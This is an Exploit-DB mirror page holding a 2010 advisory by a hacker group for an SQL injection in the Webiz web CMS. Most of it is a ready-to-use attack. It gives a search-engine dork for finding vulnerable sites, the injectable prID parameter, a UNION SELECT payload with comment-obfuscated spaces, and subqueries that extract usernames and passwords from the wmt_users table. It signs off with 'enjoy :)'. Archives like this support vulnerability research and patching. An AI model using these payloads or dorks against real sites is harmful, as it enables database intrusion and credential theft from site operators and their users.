bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12798.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

93 lines
No EOL
3.4 KiB
Text
Raw Blame History

@@@@@@ @@ @@ @@@@@ @@@@@ @@ @@@@ @@ @@@@@@ @@@ @@@@
@@ @@ @@ @@ @@ @@ @@ @@ @ @@ @@ @@ @ @ @@ @
@@ @@@@@ @@ @@ @@@@@ @@ @@ @@ @@@@@ @@ @ @ @@ @@
@@ @@ @@ @@ @@ '' @@ @ @@ @@ @@ @ @ @@ @
@@ @@ @@ @@@@@ @@ @@ @@ @ @@ @@ @@ @@@ @@ @
VXA@HOTMAIL.FR
zn@live.de
VBHACKER.NET
===========================================================================
WEBIZ SQL INJECTION VULNERABILITY
===========================================================================
============================================================================
ABOUT ME
============================================================================
== Found By : THE PIRATOR ---> AYMEN AHMADI
== : kannibal615 ---> WALID TGS
== website : www.vbhacker.net/vb
==
== email : vxa [at] hotmail [dot] fr
== : zn [at] live [dot] de
==
==
== Thanks to : Pc-InSeCt / emptyzero
== : DAK / l3G3NDS / m0j4h3d
== : V!Ru$_T4ckJ3n / __MiM0__
== : / PrideArabs / DIESEL
== : ALL VBHACKER MEMBERS
==
============================================================================
INFORMATIONS
============================================================================
== Developers : www.webiz.gr
== vulner : SQL INJECTION
== Bug : ../wmt/webpages/index.php
== Variable1 : &prID=
== Variable2 : &apprec=
==
== dork : Powered by Webiz inurl:'wmt/webpages'
==
============================================================================
============================================================================
EXPLOIT
============================================================================
==
== Dork : Powered by Webiz inurl:'wmt/webpages'
==
== URL : ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here]
==
== Demo : http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9'
==
== exploit : index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
==
== database : MySQL 5
==
++
==
== *** Insert This Code in THE VALID COLUMN ***
++ +
== *** CHANGE [DATABASE_NAME] ***
==
==
==
==
== USERNAME
==
== (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
==
==
== USER PASSWORD
==
== (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
=============================================================================
enjoy :)
== Exploit-db.com
== VBHACKER.NET/VB
== kannibal615 Copyright (c) 2010
Reference in a new issue View git blame Copy permalink